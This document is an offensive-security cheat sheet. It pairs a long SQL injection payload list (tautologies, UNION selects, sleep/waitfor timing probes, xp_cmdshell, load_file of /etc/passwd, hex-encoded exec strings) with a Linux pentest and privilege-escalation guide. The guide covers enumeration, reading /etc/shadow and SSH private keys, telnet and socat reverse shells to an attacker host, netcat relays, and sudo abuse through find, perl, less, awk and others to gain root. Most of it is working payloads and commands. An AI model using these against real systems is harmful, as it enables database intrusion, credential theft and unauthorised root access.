x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' OR full_name LIKE '%Bob%
x' or 1=1 or 'x'='y
|
|| (double pipe) concatenate
||'6
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
||UTL_HTTP.REQUEST
ý or 1=1 --
â or 1=1 --
â or 3=3 --
)%20or%20('x'='x
%20or%201=1
(select(0)from(select(sleep(13)))v)/*'+(select(0)from(select(sleep(13)))v)+'\"+(select(0)from(select(sleep(13)))v)+\"*/
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),10)||'
' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
1' OR NOT 2470=2470-- Ontu
' WAITFOR DELAY '0:0:5'--
';WAITFOR DELAY '0:0:5'--
')) or sleep(5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
or 0=0 --
1 waitfor delay '0:0:10'--
or 'a'='a
hi or 1=1 --"
or a = a
UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
or 1=1
or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
and 1 in (select var from temp)--
or '7659'='7659
or 'text' = n'text'
--
or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
';%20waitfor%20delay%20'0:0:6'%20--%20
0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z
0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z
if(now()=sysdate(),sleep(xx),0)
1 waitfor delay '0:0:5' --
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
or 1=1--
and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
union all select @@version--
,@variable
(sqlattempt2)
or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
union select
or sleep(__TIME__)#
select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
or 2 between 1 and 3
or a=a--
or '1'='1
|
or sleep(__TIME__)='
or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
â or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
having 1=1--
) or benchmark(10000000,MD5(1))#
or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
or 'text' > 't'
(select top 1
or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
-- &password=
group by userid having 1=1--
or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
'%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
or 1 in (select @@version)--
sqlvuln;
union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
â or 3=3 --
@variable
or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
or 1/*
!
'
or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
or 3=3 --
orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)--
(SlEeP%09(14-(5-2)))
')) or sleep(5)='
' WAITFOR DELAY '0:0:5'--
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z%20=%3E
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
sleep(5)#
1 or sleep(5)#
" or sleep(5)#
' or sleep(5)#
" or sleep(5)="
' or sleep(5)='
1) or sleep(5)#
") or sleep(5)="
') or sleep(5)='
1)) or sleep(5)#
")) or sleep(5)="
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
' or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(5)--
" or pg_sleep(5)--
' or pg_sleep(5)--
1) or pg_sleep(5)--
") or pg_sleep(5)--
') or pg_sleep(5)--
1)) or pg_sleep(5)--
")) or pg_sleep(5)--
')) or pg_sleep(5)--
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
or SLEEP(5)
or SLEEP(5)#
or SLEEP(5)--
or SLEEP(5)="
or SLEEP(5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or pg_SLEEP(5)
or pg_SLEEP(5)--
or pg_SLEEP(5)#
'\"
AnD SLEEP(5)
AnD SLEEP(5)--
AnD SLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
' AnD SLEEP(5) ANd '1
'&&SLEEP(5)&&'1
ORDER BY SLEEP(5)
ORDER BY SLEEP(5)--
ORDER BY SLEEP(5)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(10) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/LINUX PENTEST
Enumeration is the key. (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enumeration. Process - Sort through data, analyse and prioritisation. Search - Know what to search for and where to find the exploit code. Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box". Try - Get ready for (lots of) trial and error.
Operating System What's the distribution type? What version? cat /etc/issue cat /etc/*-release cat /etc/lsb-release cat /etc/redhat-release
What's the Kernel version? Is it 64-bit? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz-
What can be learnt from the environmental variables? cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set
Is there a printer? lpstat -a
Applications & Services What services are running? Which service has which user privilege? ps aux ps -ef top cat /etc/service
Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check! ps aux | grep root ps -ef | grep root
What applications are installed? What version are they? Are they currently running? ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.r./
What jobs are scheduled? crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords? grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking What NIC(s) does the system have? Is it connected to another network? /sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway? cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname
What other users & hosts are communicating with the system? lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w
Whats cached? IP and/or MAC addresses arp -e route /sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Have you got a shell? Can you interact with the system?
http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Is port forwarding possible? Redirect and interact with traffic from another view
rinetd
http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
fpipe
FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig
Confidential Information & Users Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what? id who w last cat /etc/passwd | cut -d: # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l
What sensitive files can be found? cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access ls -ahlR /root/ ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting? cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history
What user information can be found? cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root
Can private-key information be found? cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key
File Systems Which configuration files can be written in /etc/? Able to reconfigure a service? ls -aRl /etc/ | awk '$1 ~ /^.w./' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
What can be found in /var/ ? ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with database information? ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File Includes"!)
http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/
auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
If commands are limited, you break out of the "jail" shell? python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i
How are file-systems mounted? mount df -h
Are there any unmounted file-systems? cat /etc/fstab
Kernel, Operating System & Device Information:
Command Result uname -a Print all available system information uname -r Kernel release uname -n System hostname hostname As above uname -m Linux kernel architecture (32 or 64 bit) cat /proc/version Kernel information cat /etc/*-release Distribution information cat /etc/issue As above cat /proc/cpuinfo CPU information df -a File system information
Users & Groups:
Command Result cat /etc/passwd List all users on the system cat /etc/group List all groups on the system for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null List all uid’s and respective group memberships cat /etc/shadow Show user hashes – Privileged command grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts finger Users currently logged in pinky As above users As above who -a As above w Who is currently logged in and what they’re doing last Listing of last logged on users lastlog Information on when all users last logged in lastlog –u %username% Information on when the specified user last logged in lastlog |grep -v "Never" Entire list of previously logged on users
User & Privilege Information:
Command Result whoami Current username id Current user information cat /etc/sudoers Who’s allowed to do what as root – Privileged command sudo -l Can the current user perform anything as root sudo -l 2>/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'
|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python
|ruby|lua|irb' | xargs -r ls -la 2>/dev/null Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.
Environmental Information:
Command Result env Display environmental variables set As above echo $PATH Path information history Displays command history of current user pwd Print working directory, i.e. ‘where am I’ cat /etc/profile Display default system variables cat /etc/shells Display available shells
Interesting Files:
Command Result find / -perm -4000 -type f 2>/dev/null Find SUID files find / -uid 0 -perm -4000 -type f 2>/dev/null Find SUID files owned by root find / -perm -2000 -type f 2>/dev/null Find GUID files find / -perm -2 -type f 2>/dev/null Find world-writeable files find / ! -path "/proc/" -perm -2 -type f -print 2>/dev/null Find world-writeable files excluding those in /proc find / -perm -2 -type d 2>/dev/null Find word-writeable directories find /home –name .rhosts -print 2>/dev/null Find rhost config files find /home -iname .plan -exec ls -la {} ; -exec cat {} 2>/dev/null ; Find .plan files, list permissions and cat the file contents find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ; Find hosts.equiv, list permissions and cat the file contents ls -ahlR /root/ See if you can access other user directories to find interesting files cat ~/.bash_history Show the current users’ command history ls -la ~/._history Show the current users’ various history files ls -la /root/._history Can we read root’s history files ls -la ~/.ssh/ Check for interesting ssh files in the current users’ directory find / -name "id_dsa" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la Find SSH keys/host information ls -la /usr/sbin/in.* Check Configuration of inetd services grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (‘pass’ in this example) and show positive matches find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log) find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null List .log files in specified directory (/var/log) find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null List .conf files in /etc (recursive 1 level) ls -la /etc/.conf As above find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located lsof -i -n List open files (output will depend on account privileges) head /var/mail/root Can we read roots mail
Service Information:
Command Result ps aux | grep root View services running as root ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' Lookup process binary path and permissions cat /etc/inetd.conf List services managed by inetd cat /etc/xinetd.conf As above for xinetd cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null Permissions and contents of /etc/exports (NFS)
Jobs/Tasks:
Command Result crontab -l -u %username% Display scheduled jobs for the specified user – Privileged command ls -la /etc/cron* Scheduled jobs overview (hourly, daily, monthly etc) ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null What can ‘others’ write in /etc/cron* directories top List of current tasks
Networking, Routing & Communications:
Command Result /sbin/ifconfig -a List all network interfaces cat /etc/network/interfaces As above arp -a Display ARP communications route Display route information cat /etc/resolv.conf Show configured DNS sever addresses netstat -antp List all TCP sockets and related PIDs (-p Privileged command) netstat -anup List all UDP sockets and related PIDs (-p Privileged command) iptables -L List rules – Privileged command cat /etc/services View port numbers/services mappings
Programs Installed:
Command Result dpkg -l Installed packages (Debian) rpm -qa Installed packages (Red Hat) sudo -V Sudo version – does an exploit exist? httpd -v Apache version apache2 -v As above apache2ctl (or apachectl) -M List loaded Apache modules mysql --version Installed MYSQL version details psql -V Installed Postgres version details perl -v Installed Perl version details java -version Installed Java version details python --version Installed Python version details ruby -v Installed Ruby version details find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate ‘useful’ programs (netcat, wget etc) which %program_name% (i.e. nc, netcat, wget, nmap etc) As above dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null List available compilers cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.*export /,"")}1' Which account is Apache running as
Common Shell Escape Sequences:
Command Program(s) :!bash vi, vim :set shell=/bin/bash:shell vi, vim !bash man, more, less find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; find awk 'BEGIN {system("/bin/bash")}' awk --interactive nmap echo "os.execute('/bin/sh')" > exploit.nse
sudo nmap --script=exploit.nse nmap (thanks to comment by anonymous below) perl -e 'exec "/bin/bash";' Perl
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null
Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? Word-writeable, "nobody" files find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print # world-writeable files find /dir -xdev ( -nouser -o -nogroup ) -print # Noowner files
Preparation & Finding Exploit Code What development tools/languages are installed/supported? find / -name perl* find / -name python* find / -name gcc* find / -name cc
How can files be uploaded? find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp
Linux Privilege Escalation using Sudo Rights
NOTE: (ALL:ALL) can also represent as (ALL) If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root. If nothing is mention for user/group then it means sudo defaults to the root user.
Traditional Method to assign Root Privilege
visudo usertest ALL=(ALL:ALL) ALL or usertest ALL=(ALL) ALL
Spawn Root Access
Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command. sudo -l In the traditional method, PASSWD option is enabled for user authentication while executing above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that current user is authorized to execute all command. Therefore we have obtained root access by executing the command. sudo su id
Default Method to assign Root Privilege
Default Method to assign Root Privilege to usertest under User Privilege Specification category. visudo usertest ALL=ALL or usertest ALL=(root) ALL
Allow Root Privilege to Binary commands
Sometimes the user has the authorization to execute any file or command of a particular directory such as /bin/cp, /bin/cat or /usr/bin/ find, this type of permission lead to privilege escalation for root access and it can be implemented with help of following steps. usertest ALL=(root) NOPASSWD: /usr/bin/find NOTE: Here NOPASSWD tag that means no password will be requested for the user while running sudo -l command.
Spawn Root Access using Find Command
compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list. sudo -l
User usertest may run the following commands on ubuntu (root) NOPASSWD: /usr/bin/find indicating that the usertest can run any command through find command. Therefore we got root access by executing below commands. sudo find /home -exec /bin/bash ; id uid=0(root) gid=0(root) groups=0(root)
Allow Root Privilege to Binary Programs
Sometimes admin assigns delicate authorities to a particular user to run binary programs which allow a user to edit any system files such as /etc/passwd and so on. certain binary programs lead to privilege escalation. In the following command we have assign sudo rights to the following program which can be run as root user. usertest ALL= (root) NOPASSWD: usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi
Spawn shell using Perl one-liner
At the time of privilege, escalation phase executes below command to view sudo user list. sudo -l Now you can observe the text is showing that the usertest can run Perl language program or script as root user. (/usr/bin/perl) Therefore we got root access by executing Perl one-liner. perl -e 'exec "/bin/bash";'
Spawn shell using Python one-liner
requires that the user can run the python language or script as root user. (/usr/bin/python) this can be determined by running sudo -l thus we can aquire root access by executing the python one-liner python -c 'import pty;pty.spawn("/bin/bash")'
Spawn shell using Less Command
requires that the user can run the less command as root user. (usr/bin/less) this can be determined by running sudo -l Hence we obtained root access by executing following sudo less /etc/hosts It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter. !bash You will get root access.
Spawn shell using AWK one-liner
requires that the user can run the AWK language program or script as root user. (usr/bin/awk) this can be determined by running sudo -l Therefore we obtained root access by executing AWK one-liner. sudo awk 'BEGIN {system("/bin/bash")}'
Spawn shell using Man Command (Manual page)
requires that the user can run the less command as root user. (usr/bin/man) this can be determined by running sudo -l sudo man man It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented below and hit enter, you get root access as done above using Less command. !bash You will get root access.
Spawn Shell Using FTP
get root access through FTP with the help of following commands: sudo ftp ! /bin/bash whoami or ! /bin/sh id whoami
root
Spawn Shell Using Socat
get root access through socat with the help of following commands. Execute below command on the attacker’s terminal in order to enable listener for reverse connection. socat file:tty,raw,echo=0 tcp-listen:1234 Then run the following command on victim’s machine and you will get root access on your attacker machine. socat exec:'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234 id whoami
root
Part Two Sequential Thinking Process#####
Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user can sudo to root:
sudo su
Here are the commands I have learned to use to perform linux enumeration and privledge escalation: What services are running as root?: ps aux | grep root
